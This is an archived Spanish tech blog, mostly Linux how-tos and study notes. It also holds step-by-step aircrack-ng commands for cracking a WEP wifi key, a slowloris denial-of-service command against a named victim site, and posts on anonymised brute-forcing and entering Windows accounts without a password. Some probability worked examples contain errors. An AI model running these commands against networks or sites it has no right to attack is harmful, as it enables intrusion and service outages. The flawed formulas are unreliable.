martes, 12 de noviembre de 2013

Crackeando redes wifi con cifrado wep



En esta ocacion explicare como podemos apropiarnos de una clave wifi con cifrado wep

para realizar el crackeo o mejor dicho auditoria a redes wifi necesitamos, una tarjeta wifi con soporte en modo monitor o modo promiscuo, anteriormente era toda una odisea conseguir una, pero actualmente la mayoria de los portatiles modernos ya tienen una nic inalambrica con soporte modo monitor.

supongamos que nuestra nic inalambrica es la wlan0, para poder colocarla en modo monitor tendremos que usar el comando airmon-ng que viene en la suite aircrack-ng, en cuyo caso de que no se tenga instalada procedemos a instalarla de esta manera.
#aptitude install aircrack-ng -y
con el anterior comando le indicamos que realize la instalacion de aircrack-ng.

una vez finalizada la instalacion de aircrack, ahora si procedemos a activar el modo monitor de nuestra tarjeta wifi, con el siguiente comando.
#airmon-ng start wlan0
esto nos dara como resultado una nueva interfaz de red la cual por defecto mayormente es mon0.



seguidamente ejecutaremos el siguiente comando, para poder observar las redes wifi, en cuyo caso que nos topemos con una con cifrado wep.

#airodump-ng mon0
Como podemos observar en la imagen nos hemos topado con una red wifi con cifrado wep.


Ya que como es un tutorial no se crackeara una cuenta verdadera por ello he ocultado la informacion de las rede inamabricas.

Una vez descubierta la red inalambrica con cifrado wep, procederemos a recolectar informacion, para este proceso necesitamos el ESSID que en este caso seria XXXX en aplicaciones reales vendria siendo en nombre de la red.

ademas de eso necesitamos la direccion mac de la red inalambrica en este caso la direccion mac del punto de acceso.

Para esta practica seria la 10:20:30:40:50:60 y para terminar necesitamos el canal por donde transmite la red en este caso es el canal 1


ya que sabemos todo esto ahora si ejecutaremos el siguiente comando que nos pondra en la escucha de los paquetes DATA los cuales necesitaremos una vez alcanzado los 10mil o 15mil DATA para decifrar la clave.
#airodump-ng -c 1 -w capturandodata --bssid 10:20:30:40:50:60 mon0
ahora abriremos otra consola con la cual realizaremos una asociancion a la red wifi para comprobar la conectividad de la red wifi con nuestra nic inalambrica

#aireplay-ng -1 0 -a 10:20:30:40:50:60 -h 00:11:22:33:44:55 -e XXXX mon0

donde
-1 indica el tipo de accion que realizara de nivel 0
-a representa la direccion mac del punto de acceso
-h representa la direccion mac de nuestra nic inalambrica
-e representa el ESSID de la red a atacar
mon0 la interfaz de red en modo monitor.
Una vez que nos hemos asociado satisfactoriamente, es hora de inyectar trafico de esta forma

#aireplay-ng -3 -b 10:20:30:40:50:60 -h 00:11:22:33:44:55 mon0
lo que lograremos al inyectar trafico es que los paquetes DATA aumenten con lo que en poco tiempo llegaremos a los 10mil DATa para poder decifrar la clave.
Una vez que hemos conseguido como minimo 10mil paquetes DATA abrimos una nueva consola y tipeamos el siguiente comando con el fin de que empieze a decirfrar la clave, hay que recordar que debemos estar en la misma direccion donde se creo el archivo caprutardata-01.cap

#aircrack-ng capturandodata-01.cap
al finalizar nos revelara la clave con lo que podremos acceder a la cuenta ahora solo falta desactivar el modo monitor de esta forma

#airmon-ng stop wlan0 && airmon-ng stop mon0

y con esto he finalizado una nueva entrada.

martes, 5 de noviembre de 2013

Instalacion de Obkey el GUI para los atajos en LXDE



En esta ocacion y antes de irme a la universidad les quiero compartir esta excelente aplicacion, si te fastidia estar peleando con LXDe a la hora de crearle atajos de teclado la solucion a esto es Obkey, una GUI que nos permite crear atajos de teclado, en mi caso siempre la uso para crear un atajo de teclado a la terminal de esta forma puedo abrir una terminal solo presionando una combinacion de teclas.

bueno empezemos, obkey lo podemos descargar de aqui

https://code.google.com/p/obkey/downloads/list

una vez descargado procedemos a descomprimir el archivo, de esta forma

$tar -zxvf obkey*

una vez descomprimido a mover la capeta a la direccion /opt de esta forma

#mv obkey* /opt

borramos el tar.gz

#rm obkey*tar.gz

ahora solo crearemos un link simbolico para poder tenero acceso al programa desde cualquier lugar.

#ln -s /opt/obkey*/obkey /usr/bin

con esto podemos ejecutar obkey desde cualquier parte de nuestro directorio dentro de la terminal ahora para mandarlo a llamar y poder crear un link simbolico ejecutaremos el siguiente comando

$obkey  /home/USUARIO/.config/openbox/lxde-rc.xml

donde USUARIO es el usuario de tu cuenta.

de esta forma hemos instalado obkey




el uso de obkey es intuitivo, primero le damos clic donde dice la imagen






esto nos crea un nuevo Key




le damos clic al key creado con anterioridad y le especificamos la combinacion te teclas que queremos





ahora le damos clic a la cruz verde y luego seleccionamos la accion en este caso yo escogi la accion Execute





ahora solo colocamos el comando que queremos que ejecute en el campo command yo e colocado lxterminal ya que quiero que se ejecute la terminal al momento de presionar la combinacion de teclas escogida,  seguidamente damos en la imagen del disquette para guardar los cambios y con eso hemos finalizado ya podremos usar nuestro atajo de teclado.






de est form concluimos.

CactiInstaller



En esta ocacion les traigo un programa, mas bien un script que hice ya hace un tiempo y se los comparto a ustedes, este script permite la instalacion de Cacti en nuestro servidor, desafortunadamente se me perdio la version mas nueva de este script desarrollado por mi, la cual tenia soporte para varias distros de linux, con el tiempo mejorare este script.

les dejo el script, este se encuentra en mi github

https://github.com/jopc/CactiInstaller

Proyecto de RF



En esta ocacion les traigo material de un proyecto que hice el cuatrimestre pasado, es un receptor y transmisor de radiofrecuencia usando el microcontrolador 16f84a a bajo dejare el link de descarga,

Saludos.

https://drive.google.com/file/d/0B-nRkg4FrlcBZDFyOWNQdW1ZU2s/edit?usp=sharing

Eliminando nuestro antiguo nucleo Linux en Debian



En esta nueva entrada explicare el procedimiento de como podemos eliminar el nucleo de linux el cual no utilizamos, para eso solo necesitamos ejecutar un par de comandos que nos ayudaran en este procedimiento.

#dpkg -l | grep linux-image

el anterior comando nos permite saber que nucleos de linux tenemos instalado lo cual nos servira para desinstalar el nucleo que no estamos usando.

seguidamente ejecutamos el comando para eliminarlo
donde linux-image-x.x.x-x representa el nucleo que queremos eliminar.

#aptitude install remove linux-image-x.x.x-x

#aptitude install purge linux-image-x.x.x-x

con esto hemos finalizado esta entrada.
 

lunes, 4 de noviembre de 2013

Reseteando la contraseña de root en Gnu/Linux




En esta ocacion explicare como nosotros podemos resetear la contraseña de Gnu/Linux, el proceso es muy sencillo es similar al metodo de recuperacion de Grub2 el cual publique hace apenas unas horas.

bueno para poder realizar esto necesitamos un Livecd o un LiveUSB lo que ustedes prefieran.

bueno manos a la obra, el proceso es sencillo.

Iniciamos nuestro LiveCD en este caso un ubuntu LST o un SLAX en el caso de los que quieran usar un LiveUSB, y montamos la unidad donde se encuentra la direccion raiz, suponiendo que este es nuestro particionado


sda1          /boot
sda2          swap
sda3          /


sda3 vendria siendo la particion donde se encuentra el direoctorio raiz

asi seria el comando

$sudo mount /dev/sda3 /mnt


una vez montado en la direccion /mnt

procedemos a montar la unidad de boot de esta manera

$sudo mount /dev/sda1 /mnt/boot


una vez hecho esto procedemos a realizar el enjaulamiento de esta forma

$sudo chroot /mnt

de esta forma podemos tener acceso a la particion, ya aqui solo ejecutamos el comando

#passwd

el anterior comando nos permitira cambiar la contraseña de root, ahora solo colocamos la nueva contraseña y de esta forma tan sencilla hemos cambiado la contraseña de Gnu/Linux.

ahora solo nos falta salir con el comando "exit" y reiniciar nuestro equipo y con esto  hemos finalizado este pequeño tutorial.

PD: para los usuarios de SLAX recordar que no es necesario usar sudo, con que solo se logeen como root con el comando "su" pueden ejecutar estos comandos sin necesidad de anteponer sudo.

Recuperando nuestro Grub2



En esta ocacion les traigo un pequeño manual en donde explicare como reparar nuestro grub2 al tener una falla con el, para ello necesitamos un livecd de Gnu/Linux, yo use Ubuntu LTS para realizar hace un tiempo una recuperacion de mi grub2 asi que pueden escoger ese o el que quieran.

una vez arrancado nuestro Livecd procedemos a abrir una terminal con lo cual revisaremos en que particion se encuentra nuestro sistema

en este caso se tomara como ejemplo este juego de particiones, pero puede usar el comando "fdisk -l" para ver su particionado.

sda1          /boot
sda2          swap
sda3          /


dado que sda es nuestro disco duro, sda1 nuestra direccion boot y sda3 nuestro directorio raiz, procederemos de esta forma

montamos nuestro directorio raiz que en el particionado le corresponde al sda3 en la direccion /mnt

$sudo mount /dev/sda3 /mnt



montamos nuestro directorio /boot que en el particionado le corresponde al sda1 en la direccion /mnt/boot

$sudo mount /dev/sda1 /mnt/boot

montamos la direcion de nuestro /dev en la direccion /mnt/dev
$sudo mount --bind /dev /mnt/dev

montamos la direccion /dev/pts en la direccion /mnt/dev/pts

$sudo mount --bind /dev/pts /mnt/dev/pts

montamos la direccion /proc en la direccion /mnt/proc

$sudo mount --bind /proc /mnt/proc

montamos la direccion /sys en la direccion /mnt/sys

$sudo mount --bind /sys mnt/sys


todo esto es para preparar el sistema antes de realizar el enjaulamiento el cual necesitamos todo esto ya que trabajaremos con grub2.

seguidamente seguimos con este comando

$sudo chroot /mnt

el comando anterior permite realizar el enjaulamiento esto nos permite acceder a la unidad que hemos montado con permisos de root y poder realizar instalaciones asi como recuperar el sistema.


ahora ya que estamos dentro de nuestro sistema procedemos a recuperar grub.



el siguiente comando actualizara y corroborara los puntos de booteo del sistema, es decir en este paso reconocera que sistema operativo tienes instalado en tu equipo, para que sea agregado al grub

#grub-mkconfig -o /boot/grub/grub.cfg


seguidamente se realiza la instalacion del grub en el MBR que es donde apuntamos al MBR de nuestro disco duro en este caso sda

#grub-install --recheck /dev/sda


una vez terminado todo esto ya podemos salir de la terminal con "exit"
y procedemos a reiniciar el equipo en este punto ya tendremos nuestro grub2 reinstalado y funcionando.


martes, 17 de septiembre de 2013

Accediendo a una cuenta de Windows 7 sin saber contraseña



 
Accediendo a una cuenta de Windows 7 sin saber contraseña

en este video pretendo enseñar como una persona puede acceder a una cuenta de windows 7 sin saber su contraseña correspondiente.

jueves, 29 de agosto de 2013

Proyecto de Refrigeracion en Aceite


Refrigeracion con Aceite

este video muestra el resultado final de un proyecto casero de refrigeracion con aceite de una mini laptop EeePC ASUS.

Instalacion de Android en VirtualBox



Instalacion de Android en VirtualBox

En esta ocacion traigo un video que explica como se realiza la instalacion de android x86 en una maquina virtual bajo virtualbox.

Practica de Fuerza Bruta con Medusa + Tor + Proxychains

 
 FuerzaBruta con Medusa

En esta ocacion traigo un pequeño videotutorial de ataque bajo BrutusForce, se explica como volvernos anonimos para realizar el ataque de concepto y seguidamente se realiza el ataque a una ip con un modem TELMEX.

miércoles, 28 de agosto de 2013

instalacion de packettracer en gnu/linux

Bueno empezemos, este manual estara basado en fedora 13 gnu/linux , ya que en ubuntu el packettracer se ve pesimo -_- por los tipos de fuente , eso si en fedora se ve bien y no se desfiguran las ventanas por las fuentes como en ubuntu ^^.

requisitos:

lo que necesitamos para esta guia seran solo dos herramientas

1.- nuestra confiable y poderosa terminal ^^

2.- packettracer para fedora ;)

empezemos, para eso nos descargaremos packettracer aqui dejo el link:

("disculpen mas tarde pondre el link ya que e tenido problemas con la conexion -_- ")

ya descargado nos posicionamos en la carpeta en donde se a descargado el programa :P

$ cd /home/tu-usuario/Descargas

ya dentro nos logeamos como root

$ su

y colocamos la contraseña

Contraseña:

ahora si como el programa no tiene permisos de ejecucion, le daremos sus permisos ^^

# chmod +x PacketTracer531_i386_no_tutorials_installer-rpm.bin

ya con eso solo ejecutamos el programa

# ./PacketTracer531_i386_no_tutorials_installer-rpm.bin

se iniciara la instalacion que solo consiste en dar enter y aceptar el contrato con un enter y con eso ya tendremos instalado packettracer en nuestro fedora gnu/linux ^^

ahora solo falta limpiar lo que ensuciamos eliminano el archivo que descargamos de esta forma

# rm PacketTracer531_i386_no_tutorials_installer-rpm.bin

bueno eso es todo,

PD: en estos dias libres estare posteando algunos temas variados ya que en las vacaciones son los unicos dias que tengo para postear -_- bueno en verdad solo dos semanas ya que solo tengo dos semanas de vacaciones -_-

instalacion de crossover en Gnu/Linux

En esta ocaciones instalaremos crossover, una aplicacion que nos servira para emular programas de windows mientras estamos en gnu/linux

para eso descargamos crossover desde aqui:

http://ubuntuone.com/p/34h/

ya descargado, procedemos a darle permisos de ejecucion y luego a instalarlo, pero antes hay que logearse como root ^^ de esta forma:

$ su
Contraseña:

# chmod +x install-crossover-pro-9.0.0.sh
# ./install-crossover-pro-9.0.0.sh

esto nos sacara una ventana en donde clickearemos donde dice comenzar instalacion y ya al terminar solo le damos salir :P

ahora nos posicionamos en la carpeta en donde se instalo en mi caso fue la /opt/cxoffice
pero antes nos salimos del root

# exit

y ahora nos posicionamos:

$ cd /opt/cxoffice/bin

y ejecutamos el instalador de crossover

$ ./cxinstaller

ya desde ahi escogemos nuestro office 2007 y procedemos a instalar

ya terminada la instalacion, office 2007 aparecera en el menu de nuestro escritorio, en mi caso en el menu de escritorio LXDE ;)

bueno eso es todo con eso ya debe funcionar office

PROBABILIDAD Y ESTADISTICA II

^^ bueno esta vez les traigo un manual, el cual yo mismo estoy creando, para poder apoyarme en mis estudios,

ÍNDICE

UNIDAD 1

1.- Definición de probabilidad Conjunta

2.- Regla de la Adición

3.-Eventos Mutuamente Excluyentes

4.- Eventos Mutuamente No Excluyentes entre si

5.- Regla de la Multiplicación

6.- Eventos Independientes

7.- Eventos Dependientes

8.- Probabilidad Condicional

9.- Teorema de Bayes

...................................................................................
Inicio de la unidad 1
...................................................................................

1.- Definición de probabilidad Conjunta

La probabilidad conjunta es aquella que se compone de dos eventos o mas, la que nos permite saber cual es la probabilidad de que dos eventos o mas sucedan

2.- Regla de la Adición

La regla de la adición o la regla general de la suma, expresa que cuando un problema de probabilidad tiene como condición que se presenten uno u otro evento, la probabilidad total se forma por la suma directa de las probabilidades individuales si los eventos son mutuamente excluyentes, esto es, P(A o B) = P(A) + P(B).

y en el caso de eventos mutuamente no excluyentes entre si,debe considerarse de que la probabilidad de que ocurra varios eventos está incluida en ellos, por lo que debe restarse esa probabilidad de la suma directa y se expresa de la siguiente forma:
P(A o B) = P(A) + P(B) - P(AyB).

3.-Eventos Mutuamente Excluyentes

Los eventos mutuamente excluyentes, son aquellos que no pueden ocurrir al mismo tiempo, es uno o es otro, así de sencillo ^^

..........................................................................................
Ejercicio
..........................................................................................

Una caja contiene 6 billetes de $500.00, 3 de $50.00 y 1 de $100.00 Determine la probabilidad de que al extraer al azar uno de estos este sea de $100.

Solución:


  • La formula básica del a probabilidad es
Probabilidad = Numero de eventos exitosos / Total de eventos = n/N

billete de $100.00 = Numero de billetes de $100.00 / Total de billetes

= 1/6+3+1 = 0.1 = 10%
4.- Eventos Mutuamente No Excluyentes entre si

Estos suceden, cuando la ocurrencia de un evento no impide que suceda también otro, por ejemplo, que una persona sea doctor y que tenga mas de 35 años.

.......................................................................................
Ejercicio
.......................................................................................

De un grupo de 45 estudiantes universitarios, 28 estudian ingles y 16 estudian francés, además de que 12 no estudian idiomas. Prepare un diagrama de Ven que ilustre esta situación, y determine la probabilidad de que al entrevistar al azar a un alumno del grupo, este estudie ingles y francés.

Solución:


  • Datos para el diagrama de Ven
Numero de estudiantes de ambos idiomas:

= est. ingles + est. francés - No est. ingles ni francés - Total de est.

= 28 + 16 +12 - 45 = 11

Numero de estudiantes solo de ingles

= Numero de estudiantes de ingles - estudiante de ambos idiomas

= 28 - 11 = 17

Numero de estudiantes solo de francés

= Numero de estudiantes de francés - estudiante de ambos idiomas

= 16 - 11 = 5


  • Diagrama de Ven

  • La formula de la probabilidad es:
probabilidad = Numero de eventos exitosos/Total de eventos exitosos = n/N

P(ambos idiomas) = Numero de est. de ambos idiomas / Total de est.

= 11/45 = 0.244 = 24.4%

5.- Regla de la Multiplicación

Esto ocurre cuando el enunciado de un problema de probabilidad tiene como condición que se presenten uno y otro evento por ejemplo un alumno de ingles y de francés , la probabilidad total se forma por la multiplicación directa de las probabilidades individuales si los eventos son independientes, esto es, P(A y B) = P(A) * P(B).

Y si los eventos son dependientes debe considerarse las probabilidades de que ocurra un segundo evento, si ya ocurrió un primero, y se expresa así:
P(A y B) = P(A) * P(B/A) o P(B y A) = P(B) * P(A/B).

P(A/B) indica la probabilidad de que ocurra, el evento B, si se sabe que ya ocurrió el evento A.


6.- Eventos Independientes

Los eventos son independientes cuando no se ven afectado por otro

.................................................................................................
Ejercicio
................................................................................................

Una caja contiene 6 billetes de $500.00, 3 de $50.00 y 1 de $100.00 Determine la probabilidad de que al extraer al azar uno de estos, este sea de $50.00 o de $100.00.

Solución:

  • Si los eventos son independientes, la probabilidad total es la suma de las probabilidades individuales, por lo tanto.
p($50 o $100) = P($50) + P($100)

= (No. bille. de $50 / Total de bille.) + (No. bille. de $100/Total de bille.)

= (3/6+3+1) + (1/6+3+1)

= 0.3 + 0.1 = 0.4 = 40%

  • Solución alternativa
P($50 o $100) = 1 - P($50)

= 1 - No. de Bille. $50 / Total de Bille.

= 1 - (6/6+3+1)

= 1 - 0.6 = 0.4 = 40%

7.- Eventos Dependientes

Cuando un evento afecta la probabilidad de que suceda otro, se dice que uno es dependiente del otro, o que son dependientes; por ejemplo, si un trabajo se hace descuidada mente es mas probable que resulte mal.

...................................................................................................
Ejercicio
...................................................................................................

Una caja contiene 6 billetes de $500.00, 3 de 50.00 y 1 de $100. Determine la probabilidad de que, al extraer al azar dos de estos, ambos sean de $500.00.

Solución:

  • Para que se cumpla el enunciado, el primer billete debe ser de $500.00. Este evento tiene como probabilidad la siguiente:

P(primer billete que sea de $500.00) = Numero de billetes de $500.00 / Total de billetes

= 6/10 = 0.6

También debe ocurrir que el segundo billete sea de $500.00. Este evento tiene como probabilidad la siguiente:

P(segundo billete sea $500.00) = Numero de billetes de $500.00 / Total de billetes restantes

=5/9 = 0.5556

Observe que el calculo de la probabilidad incluye el hecho de que ya se extrajo de la caja un billete de $500.00.

  • La probabilidad de que dos eventos dependientes se presenten simultanea mente es la multiplicación de las probabilidades de ambos eventos, esto es,

P[Pri. $500 y Seg. $500.00] = P [Pri. $500] y [seg. $500]

= (0.6) (0.5556) = 0.333


8.- Probabilidad Condicional

La probabilidad condicional se refiere al calculo de la probabilidad de un evento, cuando se sabe que ya ocurrió otro con el cual esta relacionado; por ejemplo, ¿cual sera la probabilidad de que llueva si el día esta nublado?

9.- Teorema de Bayes

El teorema de bayes, en su forma mas sencilla, permite calcular la probabilidad de que ocurra el evento B, si se sabe que ya ocurrió el evento A, esto es, P(BA). Para ello se requiere conocer la probabilidad simple de que ocurra el evento A, o sea P(A); la probabilidad simple de que ocurra el evento B, es decir, P(B); y la probabilidad de que ocurra el evento A, si se sabe que ya ocurrió el evento B, o sea , P(AB).

Lo anterior puede expresarse por medio de la siguiente formula, la cual se aplica a continuación:

P(BA) = P(AB) * P(B) / P(A)

........................................................................................
Ejercicio
........................................................................................

El 55.26% de los automóviles de un estacionamiento son de cuatro puertas. Los automóviles blancos son 21.27% del total, y los automoviles de cuatro puertas escogidos de entre los blancos son el 59.77%.Determine el porcentaje de los autos blancos escogidos de centre los de cuatro puertas.

Solución:

  • Sea A = Porcentaje de autos de cuatro puertas
  • Sea B = Porcentaje de autos blancos
  • sea AB = porcentaje de autos de cuatro puertas que son de color blanco


Los datos del problema son:

  • P(A) = 55.26% = 0.5526
  • P(B) = 21.27% = 0.2127
  • P(AB) = 59.77% =0.5977
El porcentaje deseado es: P(autos blancos que son de cuantro puertas), lo cual puede obtenerse el teorema de Bayes para probabilidades condicionales.

  • P(BA) = P(AB) * P(B) / P(B)
= (0.5977) * (0.2127) / (0.5526)

= 0.2301

= 23.01%

Observe que P(AB) es diferente a P(BA).

instalacion de SDL en GNU/linux

bueno mis seguidores en este momento les enseñare como realizar la instalacion de SDL una libreria de C/C++ en la cual se pueden crear videojuegos en 2D

Bueno Empezemos:

para empezar necesitamos solo un complemento que es el comprimido tar.gz que lo podemos descargar desde la pagina oficial aqui les dejo la URL para que lo descarguen facilmente

http://www.libsdl.org/release/SDL-1.2.14.tar.gz
o de igual manera lo puedes descargar con ayuda de wget de esta forma

$ wget http://www.libsdl.org/release/SDL-1.2.14.tar.gz

bueno ya descargado procedemos a la descompresion e instalacion como ya sabran eso es muy sencillo, ya si no lo saben no importa aqui se explica

//en esta primera linea solo descomprimimos el paquete para su instalacion

$tar -zxvf SDL-1.2.14.tar.gz

//aqui procedemos a ingresar a la carpeta producto de la descompresion
// y a logearnos como root para realizar la instalacion ademas de instalar sdl en nueestro sistema

$cd SDL*
$./configure
$make
$su -c 'make install'


bueno con todo eso ya tendremos instalado SDL en nuestro GNU/linux en mi caso en mi Slackware ya para realizar la compilacion y como renombrar el include en el codigo de nuestro proyecto que realizamos quedaria asi


// en el caso del include seria de esta forma solo sin las comillas

#include <"SDL/SDL.h">

//en el caso de la compilacion queda de sta forma

g++ SDL.cpp -o prueba 'sdl-config --libs --cflags'

/* que quiere decir todo esto? pues muy claro

SDL.cpp -> es el nombre del codigo que compilare
-o -> indico que se realizara una compilacion
prueba -> nombre del programa resultado de la compilacion

y ya lo restante son paramentros para indicar que se usara la libreria SDL.h en esta compilacion */



bueno creo que eso es todo y espero que le sirva a alguien esta informacion como a mi me a servido en el tiempo que realizo el curso de esta intersante libreria de C/C++

bueno nos vemos hasta la proxima publicacion

subneteando las redes ipv4

ok aqui de nuevo, pero esta vez explicando como se subnetea

bueno en las redes existen dos tipos de subneteo pero aqui solo enseñare una, ¿por que? se preguntaran

por que la otra ya casi no se usa xD y la que enseñare es la que actualmente se usa en las redes tcp/ipv4

ok empezemos: 

subnetear es muy facil solo es de aprender de forma ordenada las columnas de la tabla y con eso ya sabras subnetear

¿pero esa tabla como es? 

pues muy sencillo aqui la pondre :P



|------8------|------16------|------24------|------32------|

11111111.11111111.11111111.11111111
                                   
esta parte de la tabla muestra los bits encendidos que tiene una ip de version 4 los cuales son de 32 de esta idea se basa la tabla y de los multiplos de los valores de cada bit

lo que debemos de saber es que cada rangos de bits son llamados octetos ya que son 8 bit en cada rango y la suma de sus octetos siempre dara 256.

|-------------------------------------------24-------------------------------------------------|-------------------------32----------------------|
      1            1             1          1          1          1         1        1   .    1       1      1      1     1    1  1  1
     17          18           19        20        21        22       23      24      25     26    27    28   29 30 31 32 
  32768    16384      8192    4096    2048    1024    512    256    128    64    32    16    8    4  2  1                    
aqui doy una pequeña ampliacion de los octemos que mas se usan que on el penultimo y el ultimo con prefijos de 24 y 32



bueno con eso nosotros podemos saber si las peticiones de ip se pueden satisfacer por ejemplo yo quiero montar una red en donde solo usare 600 ips pues con eso podemos saber que el que cumple las peticiones de ip es el 1024 con un prefijo 22, pero por que 22? creo que se estan preguntando eso es por que empezamos desde el prefijo 16 ya que antens del prefijo 24 esta el 16 y empezamos a contar los bits hasta llegar a la posicion del 1024 y asi es como obtenemos que es prefijo 22


pero ahora como saco la mascara de red? pues muy sencillo con el penultimo trozo de la tabla :P


sabiendo que ya tenemos el prefijo ya con solo eso puedes sacar la mascara

         |----------------------------24---------------------------------|-------------------------------32--------------------------|
 1      .   1      1      1      1      1      1      1      1    .     1      1     1      1       1      1      1      1

16     .   17    18    19    20    21    22    23    24   .   25    26    27    28    29    30    31    32
255   .  128  192  224  240  248  252  254  255 .    128  192  224  240  248  252  254  255

bueno ya con esta otra tabla podemos saber que mascara de red le pertenece la dichoso prefijo 22

sabiendo que el prefijo 22 es el penultimo de los octetos entonces la mascara quedaria asi

255.255.252.0

por que? por que a 22 le corresponde 252



y como nos quedaria expresado el subneteo?

de esta forma si nuestra ip es 192.168.6.0

ipred                     ip-primera                ip-final                   ip-broadcast          prefijo       mascara-red

192.168.6.0          192.168.6.1          192.168.13.254        192.168.13.255          22          255.255.252.0

192.168.14.0


y por que hizo un salto de 8? a por que respecto a esta tabla se podran dar cuenta :P         |----------------------------24---------------------------------|-------------------------------32--------------------------|
 1      .   1      1      1      1      1      1      1      1     .     1      1     1      1       1      1      1      1

16     .   17    18    19    20    21    22    23    24   .   25    26    27    28    29    30    31    32
 1      .  128   64    32    16     8      4      2     1     .  128  64    32    16     8      4      2      1 


como ven al 22 le corresponde 4, pero como hasta 4 es donde los bits se encuentran apagados o en uso se toma el siguiente valor siendo este el 8

bueno mas claro no puede estar creo, si aprendes bien estas tablas podras subnetear mentalmente :P

por ultimo este tipo de subneteo es bajo VLSM el cual al iniciar el subneteo en VLSM se subnetea primero el rango de ips mas grande en las redes,


un ejemplo
 si en una red a varios subredes la subred mas grande es a la que se subneteara primero y asi sucesibamente

subred1      ips 1000
subred2      ips 300

subred3      ips 500

quedando organizado de esta forma


 subred1      ips 1000
subred3      ips 500

subred2      ips 300

en el que primero se subneteara la subred1 luego la subred3 y por ultimo por tener menos ips la subred2


bueno eso es todo ojala que a alguien le sirva esta informacion..........

instalacion de ZoneMinder

en esta ocacion y por que en verdad ando aburrido xD aqui les traigo la instalacion de ZoneMinder version de prueba, ¿por que version de prueba? por que esta entrada estara cambiando mucho ya que esta enfocado a ubuntu o derivados, pero por razones de tiempo no se a podido enfocar a GNU/Linux para ser usado en todas las Distribuciones.

bueno empecemos:

para empezar neesitas instalarnos el lamp (Linux+apache+mysql+php)

y esto lo hacemos asi:
 

$sudo aptitude install apache2
$sudo aptitude install php5
$sudo aptitude install mysql-server
$mysqladmin -u root password db_user_password
$sudo aptitude install libapache2-mod-auth-mysql
$sudo aptitude install php5-mysql

$sudo /etc/init.d/apache2 restart

al final tendremos lamp instalado pero ahora necesitamos instalar zoneminder esto es muy sencillo

$sudo aptitude install zoneminder


ya de instalarse accederemos desde nano a esta direccion /etc/apache2/apache2.conf

de esta forma

$sudo nano /etc/apache2/apache2.conf


y pegaremos hasta el final del documento , el contenido de este archivo /etc/zm/apache.conf

guardamos y reiniciamos apache

$sudo /etc/init.d/apache2 restart

con eso zoneminder ya estara instalado ahora revisamos la direccion donde se encuentra y notaras su existencia en tu sistema

http://127.0.0.1/zm


Nota: esta guia esta cambiando ya que su fin no es solo instalar Zoneminder, igual es configurarlo y
volverlo compatible con diferentes distros no solo con ubuntu...

Instalacion de Blender en GNU/LInux

para esta nueva entrada mostrare el proceso de instalacion de blender para los sistemas GNU/Linux

para esto, necesitamos descargar blender desde la pagina oficial, aqui dejare la URL


http://www.blender.org/download/get-blender/

yo tomare en cuenta que el paquete descargado de blender se guardo en mi escritorio con terminacion .tar.bz2 entonces inicio la instalacion de esta forma

$cd /home/JopcXy/Desktop

$su -c 'mkdir /opt'                     # crear la carpeta en caso de que no exista
$su -c  'cp blender*bz2 /opt'
$cd /opt
$su -c 'tar -jxvf blender*bz2'
$su -c 'rm blender*bz2'
$cd /usr/local/bin
$su -c 'ln -s /opt/blender-2.59-linux-glibc27-i686/blender'



y con eso ya tendremos instalado blender en nuestro sistema, bueno me despido por ahora, y esperen la siguiente publicacion :P 

o si y para culminar un enlace a una wiki que explica el uso de blender

http://es.wikibooks.org/wiki/Blender_3D:_novato_a_profesional

Eclipse Juno con SDK Android




  
Eclipse Juno con SKD Android

Hola a todos los seguidores, en esta ocacion les traigo el primer videotutorial de tecnoutopica, espero poder hacer mas y que no sea el ultimo, ya que tengo planeado varios videotutoriales aparte de este, pero en fin espero que les sea de utilidad, hasta una nueva entrega de Tecnoutopica.

lunes, 3 de junio de 2013

Denegacion de Servicios a Sitios Web

Advertencia: Toda la informacion que sera explicada y aplicada puede producir danios a equipos, solo se ensenia por fines educativos, el autor del texto no se hace responsable del danio que hagan terceros con esta informacion.


Primero dare una breve explicacion de lo que es denegacion de servicos

D.O.S.

la denegacion de servicios es una tecnica muy usada por los hacktivistas o cyberpunk como metodo de huelga hacia alguna empresa o institucion, y esta consiste en dejar inoperable los servicios de las empresas.

mas bien consiste en congelar los servidores o  inundar el trafico de la red hacia esos ordenadores.


existen varios metodos para realizar dicha proeza, de todos esos metodos se divide en dos ramas los de saturario de trafico por red y los de ataques a vulnerabilidades.

hoy solo explicare el metodo de saturacion de trafico por red, es algo complicado realizar el metodo por vulnerabilidad por que antes de realizar dicho metodo se tiene que realizar todo una investigacion de campo, lo cual en futuras entradas explicare el metodo de explotacion de vulnerabilidades desde el inicio hasta el final deacuerdo a los pasos de que un ethical hacker debe seguir, y sin mas de que hablar es hora de mensionar la herramienta que usaremos para realizar el ataque.

Slowloris

Esta herramienta es una hacktool programada en perl, que a futuro mientras avancemos con el curso de perl desentraniaremos sus secretos :)

slowloris lo que hace es abrir muchas sessiones http o https con el fin de saturar la cantidad de peticiones que el servidor prmite abrir, la ventaja de esto es que slowloris no cierra las sessiones las deja abiertas mientras sigue abriendo mas sessiones.

aclaro slowloris solo funciona con sitios web no tan potentes o poderosos, como portales a intranet o cosas de ese tipo, slowloris se basa en la comunicacion por dns de la red para realizar su ataque ya que con base a ello puede saber donde se encuentra el sitio al comunicarse con el dns.


una vez sabiendo esto es hora de explicar su uso, usare el mismo procedimeinto colocare codigo y seguidamente explicare cada paramentro del mismo.

Donde Descargar Slowloris

esta hacktool la podemos descargar desde su sitio oficial en

http://ckers.org/slowloris/

ademas de que nos indica que complementos necesita para poder funcionar.

Ejemplo

ya que hemos descargado slowloris es hora de enseniar como se usa.

el metodo para atacar sitios web con protocolo http es el siguiente.

(jopc)# ./slowloris.pl -dns www.sitiowebvictima.com -port 8080 -timeout 30 -num 500


-dns indica el sitio web a donde nos dirijiremos para realizar el ataque

-port es el parametro que nos ayuda para indicar el puerto que usa el sitio web a atacar.

-timeout es el tiempo de espera que usa el programa para el inicio de ciclos

-num es el paramentro que indica la cantidad de perticiones que pedira al servidor.


para el soporte al protocolo https solo se agrega el siguiente parametro

-https este parametro permite a slowloris soporte a https


bueno eso es todo por hoy, recuerden que esta informacion es para fines educativos, no para estar de malandros en la red, si los llegan a meter al bote recuerden no me conocen C:

Saludos.

jueves, 30 de mayo de 2013

Rutas Estaticas, Sumarizacion y Rutas por defecto en Router Cisco

Antes de continuar usted ya debe saber como configurar un router cisco en caso de que no lo sepa lo invito a que vea mi anterior entrada

Configuracion Basica de Router Cisco


Ruta Estatica

 Las rutas estaticas son utilizadas para la conexion entre redes pequenias ya que su utilizacion en redes grandes seria toda una proeza realizarlas, por su complejidad mientras mas cantidad de dispositivos de red hay en la red mayor es la complejidad de la red en operar bajo rutas estaticas.

